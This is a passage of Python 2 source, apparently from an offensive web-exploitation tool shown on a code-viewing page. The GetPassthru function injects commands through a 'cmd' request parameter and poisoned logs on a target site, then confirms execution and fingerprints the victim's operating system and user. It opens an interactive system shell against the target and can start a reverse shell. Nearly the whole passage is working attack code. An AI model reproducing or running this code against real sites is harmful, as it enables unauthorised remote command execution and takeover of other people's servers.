(ologurl, logmain)
| 1077 | return passthru_ext(resp,start_get) |
| 1078 | |
| 1079 | def GetPassthru(ologurl, logmain): |
| 1080 | global victimOs |
| 1081 | |
| 1082 | print colored("\nTrying to inject the website using GET 'passthru' requests.", "white") |
| 1083 | rand_str = generateRandom() |
| 1084 | url = "%s&cmd=echo %s" %(ologurl,rand_str) |
| 1085 | resp = (requests.get(url,headers=gen_headers,timeout=20, verify=False)).text |
| 1086 | vuln_count_before = len(SubstrFind(resp,"GET /%s" %rand_str)) |
| 1087 | |
| 1088 | send_passthru_req(logmain) |
| 1089 | r = requests.get(url,headers=gen_headers,timeout=20, verify=False) |
| 1090 | resp = r.text |
| 1091 | vulns = SubstrFind(resp,"GET /%s" %rand_str) |
| 1092 | vuln_count_after = len(vulns) |
| 1093 | |
| 1094 | try: |
| 1095 | start = vulns[len(vulns)-1] |
| 1096 | except: |
| 1097 | return |
| 1098 | |
| 1099 | if(vuln_count_after > vuln_count_before): |
| 1100 | print "\n[+] The website seems to be vulnerable. Opening a System Shell..\n" |
| 1101 | resp = resp[:start] |
| 1102 | got = SubstrFind(resp,"GET /") |
| 1103 | start_get = len(got)+1 |
| 1104 | |
| 1105 | uid = cleanOutput(send_passthru_cmd(ologurl,"id",start_get),True) |
| 1106 | if("uid=" not in uid and "Usage of id by " not in uid): |
| 1107 | # check if Windows operating system |
| 1108 | path = cleanOutput(send_passthru_cmd(ologurl,"path",start_get),True) |
| 1109 | if(checkIfWindows(path)): |
| 1110 | victimOs = "Windows" |
| 1111 | |
| 1112 | whoami = isUnknown(cleanOutput(send_passthru_cmd(ologurl,"whoami",start_get),True)) |
| 1113 | pwd = "" |
| 1114 | |
| 1115 | if(victimOs == "Windows"): |
| 1116 | pwd = cleanOutput(send_passthru_cmd(ologurl,"cd",start_get),True) |
| 1117 | else: |
| 1118 | pwd = cleanOutput(send_passthru_cmd(ologurl,"pwd",start_get),True) |
| 1119 | |
| 1120 | shell = "%s@%s:%s$ " %(whoami, logmain, pwd) |
| 1121 | shell.replace(' ','') |
| 1122 | |
| 1123 | cmd = "" |
| 1124 | while(cmd != "exit" and cmd != "quit"): |
| 1125 | cmd = raw_input("%s" %shell) |
| 1126 | cmd = cmd.replace("'","\"") |
| 1127 | if(cmd != "exit" and cmd != "quit"): |
| 1128 | if(checkIfReverseShell(cmd)): |
| 1129 | if(victimOs != "Windows"): |
| 1130 | passthru_reverse_shell(ologurl,start_get) |
| 1131 | else: |
| 1132 | windows_passthru_reverse_shell(ologurl,start_get) |
| 1133 | else: |
| 1134 | print cleanOutput(send_passthru_cmd(ologurl,cmd,start_get),False) |
| 1135 | print "" |
| 1136 | exit() |
no test coverage detected